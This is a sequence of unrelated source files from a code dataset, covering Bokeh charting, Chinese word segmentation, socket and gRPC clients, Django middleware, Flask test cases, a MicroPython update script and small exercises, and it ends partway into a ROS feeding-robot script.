y_range=self._ydr,\n plot_width=self.plot_width,\n plot_height=self.plot_height)\n self.categorical = False\n self.glyphs = []\n\n def start_plot(self, xgrid, ygrid):\n \"\"\"Add the axis, grids and tools to self.plot\n\n Args:\n xgrid(bool): whether to show the xgrid\n ygrid(bool): whether to shoe the ygrid\n \"\"\"\n # Add axis\n xaxis = self.make_axis(\"below\", self.xscale, self.xlabel)\n yaxis = self.make_axis(\"left\", self.yscale, self.ylabel)\n\n # Add grids\n if xgrid:\n self.make_grid(0, xaxis.ticker)\n if ygrid:\n self.make_grid(1, yaxis.ticker)\n\n # Add tools\n if self.tools:\n if not self.categorical:\n pan = PanTool()\n wheelzoom = WheelZoomTool()\n reset = ResetTool()\n self.plot.add_tools(pan, wheelzoom, reset)\n previewsave = PreviewSaveTool()\n self.plot.add_tools(previewsave)\n\n def add_data_plot(self, x_range, y_range):\n \"\"\"Add range data to the initialized empty attributes.\n\n Args:\n x_range (obj): x-associated datarange object for your `self.plot`.\n y_range (obj): y-associated datarange object for your `self.plot`.\n \"\"\"\n # Overwrite the ranges in the plot\n self.plot.x_range = x_range\n self.plot.y_range = y_range\n\n def end_plot(self, groups):\n \"\"\"Add the legend to your plot, and the plot to a new Document.\n\n It also add the Document to a new Session in the case of server output.\n\n Args:\n groups(list): keeping track of the incoming groups of data.\n Useful to automatically setup the legend.\n \"\"\"\n # Add legend\n if self.legend:\n listed_glyphs = [[glyph] for glyph in self.glyphs]\n legends = OrderedDict(zip(groups, listed_glyphs))\n if self.legend is True:\n orientation = \"top_right\"\n else:\n orientation = self.legend\n legend = Legend(orientation=orientation, legends=legends)\n self.plot.add_layout(legend)\n\n # Add to document and session if server output is asked\n self.doc = Document()\n self.doc.add(self.plot)\n if self.server:\n if self.server is True:\n self.servername = \"untitled\"\n else:\n self.servername = self.server\n self.session = Session()\n self.session.use_doc(self.servername)\n self.session.load_document(self.doc)\n self.session.store_document(self.doc)\n\n def make_axis(self, location, scale, label):\n \"\"\"Create linear, date or categorical axis depending on the location,\n scale and with the proper labels.\n\n Args:\n location(str): the space localization of the axis. It can be\n ``left``, ``right``, ``above`` or ``below``.\n scale (str): the scale on the axis. It can be ``linear``, ``datetime``\n or ``categorical``.\n label (str): the label on the axis.\n\n Return:\n axis: Axis instance\n \"\"\"\n if scale == \"linear\":\n axis = LinearAxis(axis_label=label)\n elif scale == \"datetime\":\n axis = DatetimeAxis(axis_label=label)\n elif scale == \"categorical\":\n axis = CategoricalAxis(major_label_orientation=np.pi / 4,\n axis_label=label)\n self.categorical = True\n\n self.plot.add_layout(axis, location)\n\n return axis\n\n def make_grid(self, dimension, ticker):\n \"\"\"Create the grid just passing the axis and dimension.\n\n Args:\n dimension(int): the dimension of the axis, ie. xaxis=0, yaxis=1.\n ticker (obj): the axis.ticker object\n\n Return:\n grid: Grid instance\n \"\"\"\n grid = Grid(dimension=dimension, ticker=ticker)\n self.plot.add_layout(grid)\n\n return grid\n\n def make_segment(self, source, x0, y0, x1, y1, color, width):\n \"\"\" Create a segment glyph and append it to the plot.renderers list.\n\n Args:\n source (obj): datasource object containing segment refereces.\n x0 (str or list[float]) : values or field names of starting ``x`` coordinates\n y0 (str or list[float]) : values or field names of starting ``y`` coordinates\n x1 (str or list[float]) : values or field names of ending ``x`` coordinates\n y1 (str or list[float]) : values or field names of ending ``y`` coordinates\n color (str): the segment color\n width (int): the segment width\n\n Return:\n segment: Segment instance\n \"\"\"\n segment = Segment(x0=x0, y0=y0, x1=x1, y1=y1, line_color=color, line_width=width)\n\n self._append_glyph(source, segment)\n\n return segment\n\n def make_line(self, source, x, y, color):\n \"\"\"Create a line glyph and append it to the plot.renderers list.\n\n Args:\n source (obj): datasource object containing line refereces.\n x (str or list[float]) : values or field names of line ``x`` coordinates\n y (str or list[float]) : values or field names of line ``y`` coordinates\n color (str): the line color\n\n Return:\n line: Line instance\n \"\"\"\n line = Line(x=x, y=y, line_color=color)\n\n self._append_glyph(source, line)\n\n return line\n\n def make_quad(self, source, top, bottom, left, right, color, line_color):\n \"\"\"Create a quad glyph and append it to the plot.renderers list.\n\n Args:\n source (obj): datasource object containing quad refereces.\n left (str or list[float]) : values or field names of left edges\n right (str or list[float]) : values or field names of right edges\n top (str or list[float]) : values or field names of top edges\n bottom (str or list[float]) : values or field names of bottom edges\n color (str): the fill color\n line_color (str): the line color\n\n Return:\n quad: Quad instance\n \"\"\"\n quad = Quad(top=top, bottom=bottom, left=left, right=right,\n fill_color=color, fill_alpha=0.7, line_color=line_color, line_alpha=1.0)\n\n self._append_glyph(source, quad)\n\n return quad\n\n def make_rect(self, source, x, y, width, height, color, line_color, line_width):\n \"\"\"Create a rect glyph and append it to the renderers list.\n\n Args:\n source (obj): datasource object containing rect refereces.\n x (str or list[float]) : values or field names of center ``x`` coordinates\n y (str or list[float]) : values or field names of center ``y`` coordinates\n width (str or list[float]) : values or field names of widths\n height (str or list[float]) : values or field names of heights\n color (str): the fill color\n line_color (str): the line color\n line_width (int): the line width\n\n Return:\n rect: Rect instance\n \"\"\"\n rect = Rect(x=x, y=y, width=width, height=height, fill_color=color,\n fill_alpha=0.7, line_color=line_color, line_alpha=1.0, line_width=line_width)\n\n self._append_glyph(source, rect)\n\n return rect\n\n def make_scatter(self, source, x, y, markertype, color):\n \"\"\"Create a marker glyph and appends it to the renderers list.\n\n Args:\n source (obj): datasource object containing markers refereces.\n x (str or list[float]) : values or field names of line ``x`` coordinates\n y (str or list[float]) : values or field names of line ``y`` coordinates\n markertype (int or str): Marker type to use (e.g., 2, 'circle', etc.)\n color (str): color of the points\n\n Return:\n scatter: Marker Glyph instance\n \"\"\"\n\n _marker_types = OrderedDict([\n (\"circle\", Circle),\n (\"square\", Square),\n (\"triangle\", Triangle),\n (\"diamond\", Diamond),\n (\"inverted_triangle\", InvertedTriangle),\n (\"asterisk\", Asterisk),\n (\"cross\", Cross),\n (\"x\", Xmarker),\n (\"circle_cross\", CircleCross),\n (\"circle_x\", CircleX),\n (\"square_x\", SquareX),\n (\"square_cross\", SquareCross),\n (\"diamond_cross\", DiamondCross),\n ])\n\n g = itertools.cycle(_marker_types.keys())\n if isinstance(markertype, int):\n for i in range(markertype):\n shape = next(g)\n else:\n shape = markertype\n scatter = _marker_types[shape](x=x, y=y, size=10,\n fill_color=color,\n fill_alpha=0.2,\n line_color=color,\n line_alpha=1.0)\n\n self._append_glyph(source, scatter)\n\n return scatter\n\n def show(self):\n \"\"\"Main show function.\n\n It shows the plot in file, server and notebook outputs.\n \"\"\"\n if self.filename:\n if self.filename is True:\n filename = \"untitled\"\n else:\n filename = self.filename\n with open(filename, \"w\") as f:\n f.write(file_html(self.doc, INLINE, self.title))\n print(\"Wrote %s\" % filename)\n view(filename)\n elif self.filename is False and self.server is False and self.notebook is False:\n print(\"You have a provide a filename (filename='foo.html' or\"\n \" .filename('foo.html')) to save your plot.\")\n\n if self.server:\n self.session.use_doc(self.servername)\n self.session.load_document(self.doc)\n self.session.show(self.plot)\n\n if self.notebook:\n from bokeh.embed import notebook_div\n publish_display_data({'text/html': notebook_div(self.plot)})\n\n ## Some helper methods\n def _append_glyph(self, source, glyph):\n \"\"\" Append the glyph to the plot.renderer.\n\n Also add the glyph to the glyphs list.\n\n Args:\n source (obj): datasource containing data for the glyph\n glyph (obj): glyph type\n \"\"\"\n _glyph = self.plot.add_glyph(source, glyph)\n\n self.glyphs.append(_glyph)\n","sub_path":"oldsite/python_viz/bokeh/bokeh/charts/_charts.py","file_name":"_charts.py","file_ext":"py","file_size_in_byte":15066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"539262485","text":"# !/home/imyin/python_env/newspaper_python3/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCreate on 1/11/18 4:50 PM\n\n@auther: imyin\n\n@File: word_process\n\"\"\"\n\nimport jieba\nimport re\n\nif __name__ == '__main__':\n stop_words = [line.strip() for line in\n open('/home/imyin/myProject/gitWorkSpace/BlackCoffee/Analysis/stop_words_ch', encoding='utf-8',\n mode='r')]\n words_count = []\n with open('/home/imyin/GuangDa/data/news/word_counts', mode='w') as f:\n for content in open('/home/imyin/GuangDa/data/news/hangnei.txt', mode='r'):\n cut_text = jieba.cut(content)\n for reg in cut_text:\n if reg not in stop_words and reg != '\\n' and reg != '':\n # words_count.append(reg)\n f.write(reg + '\\n')\n","sub_path":"GD/word_process.py","file_name":"word_process.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"484980819","text":"import socket\n\ns = socket.socket()\nprint('Successfully created a socket')\n\nport = 12345\n\ns.bind(('',port))\n\ns.listen(5)\n\nwhile True:\n c,addr = s.accept()\n print('Accepted a connection from {}'.format(addr))\n c.send('Thank you for the connection'.encode())\n c.close()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"8062397","text":"import spacy\n\n# 「en_core_web_sm」モデルをロード\nnlp = ____\n\ntext = \"It’s official: Apple is the first U.S. public company to reach a $1 trillion market value\"\n\n# テキストを処理\ndoc = ____\n\n# docのテキストをプリント\nprint(____.____)\n","sub_path":"exercises/ja/exc_01_07.py","file_name":"exc_01_07.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"314703481","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@file: client.py\n@time: 2020/12/20 下午8:13\n@author: shenpinggang\n@contact: 1285456152@qq.com\n@desc: \n\"\"\"\n\nimport grpc\nimport queue\nfrom week05.test.grpc import schema_pb2\nfrom week05.test.grpc import schema_pb2_grpc\n\nq = queue.Queue()\n\n\ndef generate_message():\n while True:\n num = q.get()\n print(num)\n yield schema_pb2.Request(num=num)\n\n\ndef main():\n # 获取通信\n with grpc.insecure_channel(\"localhost:50051\") as channel:\n stub = schema_pb2_grpc.GatewayStub(channel)\n q.put(1)\n # 调用循环发送消息并接收消息\n resp = stub.Call(generate_message())\n for r in resp:\n num = r.num\n q.put(num)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"week05/test/grpc/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"127694759","text":"\"\"\"Message View tests.\"\"\"\n\n# run these tests like:\n#\n# FLASK_ENV=production python -m unittest test_message_views.py\n\n\nimport os\nfrom unittest import TestCase\n\nfrom models import db, connect_db, Message, User\n\n# BEFORE we import our app, let's set an environmental variable\n# to use a different database for tests (we need to do this\n# before we import our app, since that will have already\n# connected to the database\n\nos.environ['DATABASE_URL'] = \"postgresql:///warbler-test\"\n\n\n# Now we can import app\n\nfrom app import app, CURR_USER_KEY\n\n# Create our tables (we do this here, so we only create the tables\n# once for all tests --- in each test, we'll delete the data\n# and create fresh new clean test data\n\ndb.create_all()\n\n# Don't have WTForms use CSRF at all, since it's a pain to test\n\napp.config['WTF_CSRF_ENABLED'] = False\n\n\nclass MessageViewTestCase(TestCase):\n \"\"\"Test views for messages.\"\"\"\n\n def setUp(self):\n \"\"\"Create test client, add sample data.\"\"\"\n\n User.query.delete()\n Message.query.delete()\n\n self.client = app.test_client()\n\n self.testuser = User.signup(username=\"testuser\",\n email=\"test@test.com\",\n password=\"testuser\",\n image_url=None)\n\n db.session.commit()\n\n def test_add_message(self):\n \"\"\"Can use add a message?\"\"\"\n\n # Since we need to change the session to mimic logging in,\n # we need to use the changing-session trick:\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = self.testuser.id\n\n # Now, that session setting is saved, so we can have\n # the rest of ours test\n\n resp = c.post(\"/messages/new\", data={\"text\": \"Hello\"})\n\n # Make sure it redirects\n self.assertEqual(resp.status_code, 302)\n\n msg = Message.query.one()\n self.assertEqual(msg.text, \"Hello\")\n\n def test_message_view(self):\n \"\"\"Can we go to the message template to add a message?\"\"\"\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = self.testuser.id\n\n resp = c.get(\"/messages/new\")\n html = resp.get_data(as_text=True)\n\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Add my message!\", html)\n\n def test_message_no_user(self):\n \"\"\"Reroute to home page with no user\"\"\"\n\n with self.client as c:\n resp = c.get(\"/messages/new\", follow_redirects=True)\n html = resp.get_data(as_text=True)\n\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Access unauthorized.\", html)\n\n def test_message_invalid_user(self):\n \"\"\"Reroute to home page with invalid user\"\"\"\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = 987654\n\n resp = c.get(\"/messages/new\", follow_redirects=True)\n html = resp.get_data(as_text=True)\n\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Access unauthorized.\", html)\n\n def test_message_show(self):\n \"\"\"Can you dipslay the message?\"\"\"\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = self.testuser.id\n \n m = Message(text=\"Hello there\", user_id=self.testuser.id)\n m.id = 1212\n db.session.add(m)\n db.session.commit()\n\n resp = c.get(f\"/messages/{m.id}\")\n html = resp.get_data(as_text=True)\n\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Hello there\", html)\n\n def test_message_destroy(self):\n \"\"\"Can you delete a message?\"\"\"\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = self.testuser.id\n\n m = Message(text=\"Hello there\", user_id=self.testuser.id)\n m.id = 2323\n db.session.add(m)\n db.session.commit()\n\n resp = c.post(f\"/messages/{m.id}/delete\", follow_redirects=True)\n html = resp.get_data(as_text=True)\n\n count = Message.query.filter_by(id=m.id).count()\n\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(count, 0)\n self.assertIn(\"testuser\", html)\n\n def test_msg_destroy_no_user(self):\n \"\"\"No user logged in can not delete a message\"\"\"\n\n with self.client as c:\n m = Message(text=\"Hello there\", user_id=self.testuser.id)\n m.id = 3434\n db.session.add(m)\n db.session.commit()\n\n resp = c.post(f\"/messages/{m.id}/delete\", follow_redirects=True)\n html = resp.get_data(as_text=True)\n\n self.assertEqual(resp.status_code, 200)\n self.assertIn('Access unauthorized.', html)\n\n def test_msg_destroy_invalid_user(self):\n \"\"\"Invalid user can not delete a message\"\"\"\n \n u2 = User.signup(username=\"testuser2\",\n email=\"test2@test.com\",\n password=\"testuser2\",\n image_url=None)\n u2.id = 87654\n db.session.add(u2)\n db.session.commit()\n\n m = Message(text=\"Hello there testuser\", user_id=self.testuser.id)\n m.id = 5454\n db.session.add(m)\n db.session.commit()\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = 87654\n\n resp = c.post(\"/messages/5454/delete\", follow_redirects=True)\n html = resp.get_data(as_text=True)\n\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Access unauthorized.\", html)","sub_path":"WarblerApp-main/test_message_views.py","file_name":"test_message_views.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"47682186","text":"from stepist.flow import session\nfrom stepist.flow.steps.next_step import call_next_step\n\nfrom stairs.core.session import producer_session\nfrom stairs.core.app import components\nfrom stairs.core.producer.utils import producer_retry, custom_callbacks_to_dict\n\n\nclass Producer(components.AppProducer):\n \"\"\"\n\n \"\"\"\n DEFAULT_QUEUE_LIMIT = 10 ** 6\n\n def __init__(self, app, handler, default_callbacks: list,\n custom_callbacks: list, queue_limit=None,\n single_transaction=False):\n\n self.app = app\n\n self.queue_limit = queue_limit or self.DEFAULT_QUEUE_LIMIT\n self.single_transaction = single_transaction\n\n # The main generator which yields data\n self.handler = handler\n\n # Callbacks which should be run always\n self.default_callbacks = default_callbacks or []\n # Callbacks which should be run based on user console, input\n self.custom_callbacks = custom_callbacks_to_dict(custom_callbacks or [])\n\n # Stepist step basically to forward jobs to current producer\n # e.g. from Batch Producer\n self.stepist_step = self.app\\\n .project\\\n .stepist_app\\\n .step(None,\n as_worker=True,\n unique_id=self.get_producer_id())(self.run_jobs)\n\n components.AppProducer.__init__(self, app)\n\n def __call__(self, *args, **kwargs):\n self.run(user_args=args, user_kwargs=kwargs)\n\n def run(self, custom_callbacks_keys: list = None,\n single_transaction: bool = False, user_args=None, user_kwargs=None):\n \"\"\"\n Execute producer from console with specified args and kwargs.\n Also can have custom callbacks specified there.\n \"\"\"\n custom_callbacks = []\n\n # Basic check for custom producers\n for custom_callback in custom_callbacks_keys or []:\n callback = self.custom_callbacks.get(custom_callback, None)\n if callback is None:\n print(\"Producer callback `%s` (another producer or pipeline\"\n \") not found.\" % custom_callback)\n exit()\n custom_callbacks.append(callback)\n\n # Basic check for callbacks\n if not custom_callbacks and not self.default_callbacks:\n print(\"No callbacks was found, specified default callback or use\"\n \"custom callback\")\n exit()\n\n callbacks_to_run = custom_callbacks + self.default_callbacks\n\n single_transaction = single_transaction or self.single_transaction\n user_args = user_args or []\n user_kwargs = user_kwargs or dict()\n\n # Running jobs from producer\n if not single_transaction:\n for job in self.handler(*user_args, **user_kwargs):\n self.send_job(job, callbacks_to_run)\n else:\n jobs_to_send = list(self.handler(*user_args, **user_kwargs))\n self.send_jobs(jobs_to_send, callbacks_to_run)\n\n def run_jobs(self, **kwargs):\n \"\"\"\n Stepist Handler for executing forwarded jobs.\n\n Important(!) If you want to use custom callbacks, set them using:\n `producer_session.change_custom_callbacks` contextmanager\n \"\"\"\n custom_callbacks = producer_session.get_custom_callbacks()\n self.run(custom_callbacks_keys=custom_callbacks,\n user_kwargs=kwargs,\n single_transaction=True)\n\n def send_job(self, job, callbacks_to_run):\n with session.change_flow_ctx({}, {}):\n\n # TODO: Make it more safe, it will good to run all callbacks\n # in one transaction, otherwise there is a chance to fail some\n # callback and duplication/lose data\n for callback in callbacks_to_run:\n self._job_to_stepist(job, callback.step)\n\n def send_jobs(self, jobs, callbacks_to_run):\n with session.change_flow_ctx({}, {}):\n\n # TODO: Make it more safe, it will good to run all callbacks\n # in one transaction, otherwise there is a chance to fail some\n # callback and duplication/lose data\n for callback in callbacks_to_run:\n self._job_to_stepist(jobs, callback.step, batch_data=True)\n\n @producer_retry(5, Exception)\n def _job_to_stepist(self, stepist_job, step, **kwargs):\n call_next_step(stepist_job, step, **kwargs)\n\n def get_producer_id(self):\n return \"producer:%s:%s\" % (self.app.app_name, self.handler.__name__)\n\n def get_handler_name(self):\n return self.handler.__name__\n\n def get_stepist_step(self):\n return self.stepist_step\n\n def flush(self):\n for pipeline in self.default_callbacks:\n pipeline.step.flush_all()\n\n for pipeline in self.custom_callbacks.values():\n pipeline.step.flush_all()\n\n def key(self):\n return self.get_handler_name()\n\n\ndef run_jobs_processor(project, producers_to_run, custom_callbacks_keys: list = None,\n die_when_empty=False):\n \"\"\"\n Executing forwarded jobs (from batch producer)\n \"\"\"\n steps_to_run = [p.stepist_step for p in producers_to_run]\n with producer_session.change_custom_callbacks(custom_callbacks_keys):\n project \\\n .stepist_app\\\n .run(steps_to_run,\n die_on_error=True,\n die_when_empty=die_when_empty)","sub_path":"stairs/core/producer/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"112519091","text":"from ALPSCommon import *\r\nfrom ALPSModule import ALPSPlugin\r\n\r\ndef plugin_initialize():\r\n socket_thread = ALPSThread(threadfunc=app1_thread, threadname='app1_socket_client_thread')\r\n socket_thread.start()\r\n return True # should not be omitted\r\n\r\ndef process_apple(message_packet):\r\n m = Message('MESSAGE_REPLY', 'Thank you for your apple! Now I have some apples.')\r\n ALPSDebug.alps_print(ALPSDebug.LEVEL.INFO, __name__, \"Submitted Message:\", m.name, m.length, m.body)\r\n api_submit_message(m)\r\n m = Message('MESSAGE_EAT', \"let's eat apples\")\r\n ALPSDebug.alps_print(ALPSDebug.LEVEL.INFO, __name__, \"Submitted Message:\", m.name, m.length, m.body)\r\n api_submit_message(m)\r\n\r\ndef process_thanks(message_packet):\r\n pass\r\n\r\ndef app1_thread():\r\n host = \"127.0.0.1\"\r\n port = 8001\r\n\r\n while True:\r\n time.sleep(10)\r\n try:\r\n ALPSDebug.alps_print('=' * 80)\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host, port))\r\n s.send(\"Hello, Server! I'm app1. I wanna some apples, who can give me?\")\r\n ALPSDebug.alps_print('Server says:', s.recv(1024))\r\n except Exception as e:\r\n ALPSDebug.alps_error('s.connect error:', e)\r\n break\r\n\r\nmessage_process_map = {'MESSAGE_APPLE': process_apple,\r\n 'MESSAGE_THANKS': process_thanks,\r\n 'MESSAGE_OTHER': None}\r\n\r\nALPSPlugin(message_process_map=message_process_map,\r\n initial_func=plugin_initialize)\r\n","sub_path":"WLAN Software Development Test Tool/WSDT/__Template.py","file_name":"__Template.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"112604986","text":"'''Rotates a given matrix in place by 90 degrees.'''\n\ndef rotate(matrix):\n if not matrix:\n return\n for i in range(int(len(matrix)/2)):\n offset = len(matrix) - (i + 1)\n top = i\n increasing = top\n decreasing = offset\n bottom = decreasing\n cycles = offset\n if cycles == 2:\n cycles -= 1 # If the matrix is 2/2 only do one cycle.\n for _ in range(cycles):\n TL = matrix[top][increasing]\n TR = matrix[increasing][bottom]\n BR = matrix[bottom][decreasing]\n BL = matrix[decreasing][top]\n matrix[top][increasing], matrix[increasing][bottom], matrix[bottom][decreasing], \\\n matrix[decreasing][top] = TR, BR, BL, TL\n increasing += 1\n decreasing -= 1\n\n return matrix\n","sub_path":"arrays_strings/RotateMatrix/rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"6142722","text":"import machine\nimport time\n\nled = machine.Pin(21, machine.Pin.OUT)\n\nfor i in range(9):\n led.value(1)\n time.sleep_ms(500)\n led.value(0)\n time.sleep_ms(500)\n\nf = open('green/main.py')\nupdated_code = f.read()\nf.close()\n\nf = open('main.py', \"w\")\nf.write(updated_code)\nf.close()\nmachine.reset()\n","sub_path":"red/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"234095451","text":"from typing import List\n\nimport numpy\n\n\ndef main():\n print(\"hello world\")\n\n\nif __name__ == \"__main__\":\n main()\n\nmyLst: List[int] = [1, 2, 3, 5, 7, 9]\n\nprint(myLst)\n\nfor counter in myLst:\n print(counter)\n\n# create a list\nmylist = [\"richie\", 1.84, \"inge\", 1.65, \"alex\", 1.67]\n# change one item from a list\nmylist[5] = 1.68\n# change multiple items\nmylist[0:2] = [\"richard\", 1.86]\n# remove item from list\ndel(mylist[2])\n# add item to list\nmylist + [\"kasper\", 0.71]\n# create new list and add item\nmylist_ext = mylist + [\"castor\", 1.44, \"pollux\", 1.54]\n\n# create a set\nprimesS = set((1, 2, 3, 5, 7))\n# create a tuple\nprimesT = (1, 2, 3, 5, 7)\n# create a list\nprimesL = [1, 2, 3, 5, 7]\n\n# Test if item is in list\nr = range(1, 5)\n# test if value in range\n1 in r\n\n# Web Scraping\nmain_url = \"https://www.humblebundle.com/\"\n\nimport requests\nresult = requests.get(main_url)\n\nresult.text[:1000]\n\n\nfrom bs4 import BeautifulSoup\nsoup = BeautifulSoup(result.text, 'html.parser')\n\nprint(soup.prettify()[:1000])\n\n# Collections ##############\nimport collections as col\n\nabc = 'jiwamotqgcfnudclzbyxkzmrvp'\nmycount = col.Counter(abc)\nprint(2 in mycount.values())\n\n# show type \nmycount.elements()\n# show elements of collection\nlist(mycount.elements())\n# show number of elements\nlen(list(mycount.elements()))\n\n\n############ Python OOP #######################\n############ Create a class ###########\n'''\nclass Employee:\n\n def __init__(self, first, last, pay):\n self.first = first\n self.last = last\n self.pay = pay\n self.email = first + '.' + last + '@company.com'\n\n\nemp_1 = Employee('Corey', 'Schafer', 50000)\nemp_2 = Employee('Test', 'User', 40000)\n\n# to print full name we can do:\nprint('{} {}'.format(emp_1.first,emp_1.last))\n\n# or we create a method:\n'''\n\n\nclass Employee:\n\n num_of_emps = 0\n raise_amount = 1.04\n\n def __init__(self, first, last, pay):\n self.first = first\n self.last = last\n self.pay = pay\n self.email = first + '.' + last + '@company.com'\n\n Employee.num_of_emps += 1\n\n\n def fullname(self):\n return '{} {}'.format(self.first, self.last)\n\n def apply_raise(self):\n self.pay = int(self.pay * self.raise_amount)\n\n\nemp_1 = Employee('Corey', 'Schafer', 50000)\nemp_2 = Employee('Test', 'User', 40000)\nprint(emp_1.fullname())\nprint(emp_2.email)\nprint(Employee.fullname(emp_1))\n\nprint(emp_1.pay)\nemp_1.apply_raise()\nprint(emp_1.pay)\nprint(Employee.raise_amount)\nprint(emp_1.raise_amount)\nprint(emp_1.__dict__)\nprint(Employee.__dict__)\n\nprint(Employee.num_of_emps)\n\n\n\n\n","sub_path":"scratch/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"212833764","text":"import logging\nstdlogger = logging.getLogger(__name__)\n\nclass CoffeehouseMiddleware(object):\n\n def __init__(self, get_response):\n stdlogger.info(\"Start CoffehouseMiddleware __init__\")\n self.get_response = get_response\n stdlogger.info(\"End CoffehouseMiddleware __init__\")\n \n def __call__(self, request):\n stdlogger.info(\"Start CoffehouseMiddleware __call__\")\n\n stdlogger.info(\"CoffehouseMiddleware __call__ before get_response\")\n response = self.get_response(request)\n stdlogger.info(\"CoffehouseMiddleware __call__ after get_response\")\n \n stdlogger.info(\"End CoffehouseMiddleware __call__\")\n return response\n\n def process_view(self, request, view_func, view_args, view_kwargs):\n \"\"\" Called on each request, just before Django calls the view.\n Keyword arguments:\n request -- the HttpRequest object. \n view_func -- the Python function that Django is about to use. It's the actual function object, not the name of the function as a string.\n view_args -- a list of positional arguments that will be passed to the view. Does not include the first view argument (request).\n view_kwargs -- a dictionary of keyword arguments that will be passed to the view. Does not include the first view argument (request).\n Response value: \n None -- An empty value; If it returns None, Django will continue processing this request, executing any other process_view() middleware and, then, the appropriate view. \n HttpResponse -- An HttpResponse object; If it returns an HttpResponse object, Django won't bother calling any other view or exception middleware, or the appropriate view; it'll apply response middleware to that HttpResponse, and return the result.\n NOTE: Request-phase method applied in order, from the top to bottom. This means classes defined at the start of MIDDLEWARE will be run first.\n \"\"\"\n stdlogger.info(\"start CoffehouseMiddleware process_view\")\n stdlogger.info(\"End CoffehouseMiddleware process_view\")\n return None\n\n def process_exception(self, request, exception):\n \"\"\" Called when a view raises an exception.\n Keyword arguments:\n request -- the HttpRequest object. \n exception -- an Exception object raised by the view function.\n Response value: \n None -- An empty value; the default exception handling kicks in.\n\t HttpResponse -- An HttpResponse object; If it returns an HttpResponse object, the template response and \n response middleware will be applied, and the resulting response returned to the browser. If an exception \n middleware returns a response, the middleware classes above that middleware will not be called at all.\n NOTE: Response-phase method applied in reverse order, from the bottom up. This means classes defined at \n the end of MIDDLEWARE will be run first.\n \"\"\"\n stdlogger.info(\"Start CoffehouseMiddleware process_exception\")\n stdlogger.info(\"End CoffehouseMiddleware process_exception\")\n return None\n\n def process_template_response(self, request, response):\n \"\"\" Called just after the view has finished executing.\n Keyword arguments:\n request -- the HttpRequest object. \n response -- the TemplateResponse object (or equivalent) returned by a Django view or by a middleware.\n Response value: \n TemplateResponse or equivalent response object that implements a render method. It could alter the given \n response by changing response.template_name and response.context_data, or it could create and return a \n brand-new TemplateResponse or equivalent.\n NOTE: You don't need to explicitly render responses, responses are automatically rendered once all \n template response middleware has been called.\n NOTE2: Response-phase method applied in reverse order, from the bottom up. This means classes defined at \n the end of MIDDLEWARE will be run first.\n \"\"\"\n stdlogger.info(\"Start CoffehouseMiddleware process_template_response\")\n stdlogger.info(\"End CoffehouseMiddleware process_template_response\")\n return response\n","sub_path":"coffeehouse/utils/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"396537868","text":"class Solution:\n def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:\n import math\n\n\n dist = []\n\n for index,point in enumerate(points):\n\n dist.append([math.sqrt(point[0]**2 + point[1]**2) , index])\n\n\n dist.sort(key = lambda x:x[0])\n\n\n ans = []\n\n for i in range(k):\n ans.append(points[dist[i][1]])\n\n return(ans)","sub_path":"day-30-k-closest-point-to-origin.py","file_name":"day-30-k-closest-point-to-origin.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"280297077","text":"#!/usr/bin/env python\nimport rospy\nimport time\n\nimport feedbot_trajectory_logic.tracker_interface as tracker\nimport numpy as np\nfrom learn_trajectory.srv import PlayTrajectory\nfrom std_msgs.msg import String, Empty\nfrom geometry_msgs.msg import Quaternion\n\n\nclass SpoonFeeder:\n def __init__(self):\n rospy.logwarn(\"sleeping for 5 seconds before starting recorded motion\")\n rospy.sleep(5)\n # quaternion is defined in order x,y,z,w\n self.defaultQuat = Quaternion(0.5, 0.5, 0.5, 0.5)\n self.tracker = tracker.TrackerInterface(self.defaultQuat)\n 